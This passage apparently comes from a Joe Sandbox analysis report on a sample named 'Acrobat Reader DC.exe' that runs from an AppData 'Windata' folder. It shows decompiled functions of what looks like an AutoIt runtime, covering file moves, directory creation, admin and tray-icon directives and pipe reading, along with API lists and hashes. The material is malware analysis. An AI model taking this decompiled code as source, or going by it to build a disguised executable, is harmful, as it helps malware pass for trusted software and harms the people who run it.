                                  								E00411536( &_v1084, L"\\*.*");
                                  								 *((short*)(_t86 + E004111C1( &_v1084) * 2 - 0x436)) = 0;
                                  								 *((short*)(_t86 + E004111C1( &_v560) * 2 - 0x22a)) = 0;
                                  								_v36.pFrom =  &_v1084;
                                  								_v36.pTo =  &_v560;
                                  								_v14 = 0;
                                  								_v10 = 0;
                                  								_v18 = 0;
                                  								_v36.hwnd = 0;
                                  								_v36.wFunc = 2;
                                  								_v36.fFlags = 0x614;
                                  								_t56 = SHFileOperationW( &_v36);
                                  								__eflags = _t56;
                                  								_t37 = _t56 == 0;
                                  								__eflags = _t37;
                                  								return _t56 & 0xffffff00 | _t37;
                                  							} else {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					if(_t63 == 0) {
                                  						L8:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						if(E0041313C( &_v1084,  &_v560) != 0) {
                                  							MoveFileW( &_v1084,  &_v560);
                                  						}
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                  • _wcscat.LIBCMT ref: 0044BCAF
                                  • _wcslen.LIBCMT ref: 0044BCBB
                                  • _wcslen.LIBCMT ref: 0044BCD1
                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2326526234-1173974218
                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004335CD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				short _v528;
                                  				signed int _t19;
                                  				signed char _t20;
                                  				long _t23;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				signed int _t29;
                                  				short* _t34;
                                  				void* _t35;
                                  				signed int _t36;
                                  				void* _t44;
                                  				void* _t48;
                                  				void* _t49;
                                  				void* _t52;
                                  
                                  				_t48 = __esi;
                                  				_t44 = __edi;
                                  				_t35 = __ebx;
                                  				E00433244( &_v528, _a4, 0x104);
                                  				_t19 = E004111C1( &_v528);
                                  				if(_t19 != 0) {
                                  					_t34 = _t52 + _t19 * 2 - 0x20e;
                                  					if( *((short*)(_t52 + _t19 * 2 - 0x20e)) == 0x5c) {
                                  						 *_t34 = 0;
                                  					}
                                  				}
                                  				_t20 = GetFileAttributesW( &_v528);
                                  				if(_t20 != 0xffffffff) {
                                  					__eflags = _t20 & 0x00000010;
                                  					if((_t20 & 0x00000010) != 0) {
                                  						goto L6;
                                  					} else {
                                  						goto L14;
                                  					}
                                  				} else {
                                  					_t23 = GetLastError();
                                  					if(_t23 != 2) {
                                  						__eflags = _t23 - 3;
                                  						if(__eflags != 0) {
                                  							L14:
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							goto L8;
                                  						}
                                  					} else {
                                  						if(CreateDirectoryW( &_v528, 0) == 0) {
                                  							L8:
                                  							_push(_t48);
                                  							_push(_t44);
                                  							_t49 = E00410160( &_v528, __eflags);
                                  							_t25 = E00413E8A(_t49, 0x5c);
                                  							__eflags = _t25;
                                  							if(__eflags != 0) {
                                  								_push(_t35);
                                  								 *_t25 = 0;
                                  								_t26 = E004335CD(_t35,  &_v528, _t49, __eflags, _t49);
                                  								_push(_t49);
                                  								_t36 = _t26;
                                  								E004111DC();
                                  								__eflags = _t36;
                                  								if(_t36 != 0) {
                                  									_t29 = CreateDirectoryW( &_v528, 0);
                                  									__eflags = _t29;
                                  									_t15 = _t29 != 0;
                                  									__eflags = _t15;
                                  									_t36 = _t36 & 0xffffff00 | _t15;
                                  								}
                                  								return _t36;
                                  							} else {
                                  								_push(_t49);
                                  								E004111DC();
                                  								__eflags = 0;
                                  								return 0;
                                  							}
                                  						} else {
                                  							L6:
                                  							return 1;
                                  						}
                                  					}
                                  				}
                                  			}


















                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044C7DD(void* __ecx, void* __edi, char* _a4, intOrPtr _a8) {
                                  				short _t17;
                                  				signed int _t23;
                                  				char* _t35;
                                  				void* _t37;
                                  				void* _t46;
                                  				void* _t49;
                                  
                                  				_t37 = __ecx;
                                  				_t35 = _a4;
                                  				_t48 = _a8;
                                  				if(E0041341F(_a8, L"#notrayicon", 0xb) != 0) {
                                  					_t17 = E0041341F(_t48, L"#requireadmin", 0xd);
                                  					__eflags = _t17;
                                  					if(_t17 != 0) {
                                  						__eflags = E0041341F(_t48, L"#OnAutoItStartRegister", 0x16);
                                  						if(__eflags != 0) {
                                  							goto L8;
                                  						} else {
                                  							_push(__edi);
                                  							_t49 = E00410160(_t48 + 0x2c, __eflags);
                                  							E00444B5F(_t37, _t49);
                                  							E00444BBB(_t37, __eflags, _t49);
                                  							_t23 = E004111C1(_t49);
                                  							__eflags =  *((short*)(_t49 + _t23 * 2 - 2)) - 0x22;
                                  							if( *((short*)(_t49 + _t23 * 2 - 2)) != 0x22) {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t49);
                                  								_push(_t49);
                                  								E004111DC();
                                  								return 1;
                                  							} else {
                                  								__eflags = 0;
                                  								_t7 = _t49 + 2; // 0x2
                                  								_t46 = _t7;
                                  								 *((short*)(_t49 + _t23 * 2 - 2)) = 0;
                                  								E00444B5F(0, _t46);
                                  								E00444BBB(0, __eflags, _t46);
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t46);
                                  								_push(_t49);
                                  								E004111DC();
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						 *((char*)(_t35 + 1)) = 1;
                                  						L8:
                                  						return 1;
                                  					}
                                  				} else {
                                  					 *_t35 = 1;
                                  					return 1;
                                  				}
                                  			}










                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                  • SysAllocString.OLEAUT32(?), ref: 00434F64
                                  • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                  • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                  • Opcode Fuzzy Hash: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440F0A(intOrPtr _a4, struct HDC__* _a8, WCHAR** _a12, signed int _a16, int _a20, struct HWND__* _a24, long _a28, char _a32) {
                                  				void* _t28;
                                  				struct HDC__* _t29;
                                  				signed int _t30;
                                  				struct HWND__** _t46;
                                  				signed int _t67;
                                  				int _t69;
                                  
                                  				_t46 = _a8;
                                  				_t67 = _a24;
                                  				_a24 =  *_t46;
                                  				_t28 = _t46[0x10];
                                  				if(_t28 != 0) {
                                  					DeleteObject(_t28);
                                  				}
                                  				_t29 = GetDC(0);
                                  				_a8 = _t29;
                                  				_t30 = GetDeviceCaps(_t29, 0x5a);
                                  				ReleaseDC(0, _a8);
                                  				_t69 = CreateFontW(((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9 >> 0x1f) + ((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9), 0, 0, 0, _a20, _t67 & 0x00000002, _t67 & 0x00000004, _t67 & 0x00000008, 1, 4, 0, _a28, 0,  *_a12);
                                  				SendMessageW(_a24, 0x30, _t69, 1);
                                  				if(_t46[0x22] == 1 && _a32 != 0) {
                                  					MoveWindow( *_t46, _t46[0x20], _t46[0x20], _t46[0x21], _t46[0x21], 0);
                                  				}
                                  				if(_t46[0x22] == 0 && _a32 != 0) {
                                  					SendMessageW(_a24, 0x142, 0, 0);
                                  				}
                                  				_t46[0x10] = _t69;
                                  				return E00430B87(_a4, _t46, 1);
                                  			}










                                  APIs
                                  • DeleteObject.GDI32(?), ref: 00440F24
                                  • GetDC.USER32(00000000), ref: 00440F2C
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                  • ReleaseDC.USER32 ref: 00440F46
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                  • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                  • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                  • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                  • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                  • SysAllocString.OLEAUT32(?), ref: 004350A9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                  • Opcode Fuzzy Hash: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0044B489(void* __ecx, void* __eflags, signed long long __fp0, intOrPtr _a4, signed int _a6) {
                                  				long _v8;
                                  				signed int _v12;
                                  				long _v16;
                                  				LONG* _v20;
                                  				void _v65556;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t39;
                                  				long _t53;
                                  				struct _CRITICAL_SECTION* _t60;
                                  				intOrPtr _t67;
                                  				LONG* _t72;
                                  				intOrPtr _t73;
                                  				intOrPtr _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  				signed long long _t84;
                                  
                                  				_t84 = __fp0;
                                  				_t77 = __eflags;
                                  				E00422240(0x10010);
                                  				_t74 = _a4;
                                  				_t72 = _t74 + 0x34;
                                  				_v20 = _t72;
                                  				InterlockedExchange(_t72, 0x1f5);
                                  				_push(0xffff);
                                  				 *(_t74 + 0x10) = 0xffff;
                                  				_t39 = E004115D7(_t72, _t74, _t77);
                                  				_t76 = _t75 + 4;
                                  				 *((intOrPtr*)(_t74 + 8)) = _t39;
                                  				if(ReadFile( *(_t74 + 0x2c),  &_v65556, 0xffff,  &_v8, 0) != 0) {
                                  					while(_v8 > 0) {
                                  						_t60 = _t74 + 0x14;
                                  						EnterCriticalSection(_t60);
                                  						if( *(_t74 + 0x10) <  *((intOrPtr*)(_t74 + 0xc)) + _v8) {
                                  							_t67 =  *((intOrPtr*)(_t74 + 0xc)) + _v8;
                                  							_t73 =  *((intOrPtr*)(_t74 + 8));
                                  							_a4 = _t67;
                                  							asm("fild dword [ebp+0x8]");
                                  							if(_t67 < 0) {
                                  								_t84 = _t84 +  *0x48cd18;
                                  							}
                                  							_t84 = _t84 *  *0x48cd50;
                                  							asm("fnstcw word [ebp+0xa]");
                                  							_t52 = _a6 & 0x0000ffff | 0x00000c00;
                                  							_v12 = _a6 & 0x0000ffff | 0x00000c00;
                                  							asm("fldcw word [ebp-0x8]");
                                  							asm("fistp qword [ebp-0xc]");
                                  							_t53 = _v16;
                                  							_push(_t53);
                                  							 *(_t74 + 0x10) = _t53;
                                  							asm("fldcw word [ebp+0xa]");
                                  							 *((intOrPtr*)(_t74 + 8)) = E004115D7(_t73, _t74, _t52);
                                  							E00410E60( *((intOrPtr*)(_t74 + 8)), _t73,  *((intOrPtr*)(_t74 + 0xc)));
                                  							_push(_t73);
                                  							E004111DC();
                                  							_t72 = _v20;
                                  							_t76 = _t76 + 0x14;
                                  						}
                                  						E00410E60( *((intOrPtr*)(_t74 + 0xc)) +  *((intOrPtr*)(_t74 + 8)),  &_v65556, _v8);
                                  						 *((intOrPtr*)(_t74 + 0xc)) =  *((intOrPtr*)(_t74 + 0xc)) + _v8;
                                  						_t76 = _t76 + 0xc;
                                  						LeaveCriticalSection(_t60);
                                  						if(ReadFile( *(_t74 + 0x2c),  &_v65556, 0xffff,  &_v8, 0) != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  				}
                                  				InterlockedExchange(_t72, 0x1f6);
                                  				return 0x1f6;
                                  			}






















                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                  • _memmove.LIBCMT ref: 0044B555
                                  • _memmove.LIBCMT ref: 0044B578
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                  • String ID:
                                  • API String ID: 2737351978-0
                                  • Opcode ID: 9c9723791963644ce26f31177a16715bab8c27555fa06233b9b3905fd288ecd1
                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                  • Opcode Fuzzy Hash: 9c9723791963644ce26f31177a16715bab8c27555fa06233b9b3905fd288ecd1
                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401250(void* __eax, void* __ecx, struct HWND__* __esi, intOrPtr _a4) {
                                  				struct _NOTIFYICONDATAW _v944;
                                  				int _t34;
                                  				int _t51;
                                  				intOrPtr _t61;
                                  				struct HWND__* _t62;
                                  				void* _t70;
                                  
                                  				_t62 = __esi;
                                  				_t34 = __eax - 1;
                                  				if(_t34 != 0) {
                                  					L6:
                                  					return _t34;
                                  				} else {
                                  					_t51 = _t34 + 1;
                                  					_v944.cbSize = 0x3a8;
                                  					E00412F40( &(_v944.hWnd), _t34, 0x3a4);
                                  					E00401B80(_a4, _t70);
                                  					if( *0x4974ea != 0) {
                                  						_t61 = _a4;
                                  						_v944.hWnd = __esi;
                                  						_v944.uID = _t51;
                                  						_v944.uFlags = 2;
                                  						if( *0x4974ec != 0) {
                                  							if( *(_t61 + 0x194) != _t51) {
                                  								 *(_t61 + 0x194) = _t51;
                                  								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1a8));
                                  								Shell_NotifyIconW(_t51,  &_v944);
                                  							} else {
                                  								 *(_t61 + 0x194) = 0;
                                  								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  								Shell_NotifyIconW(_t51,  &_v944);
                                  							}
                                  						} else {
                                  							if( *((char*)(_t61 + 9)) != 0) {
                                  								if( *(_t61 + 0x195) == 0) {
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1b0));
                                  									 *(_t61 + 0x195) = _t51;
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								} else {
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  									 *(_t61 + 0x195) = 0;
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								}
                                  							} else {
                                  								if( *(_t61 + 0x194) == _t51) {
                                  									 *(_t61 + 0x194) = 0;
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					KillTimer(_t62, _t51);
                                  					_t34 = SetTimer(_t62, _t51, 0x2ee, 0);
                                  					goto L6;
                                  				}
                                  			}










                                  APIs
                                  • _memset.LIBCMT ref: 0040127C
                                    • Part of subcall function 00401B80: _memset.LIBCMT ref: 00401C02
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32 ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 1792922140-0
                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
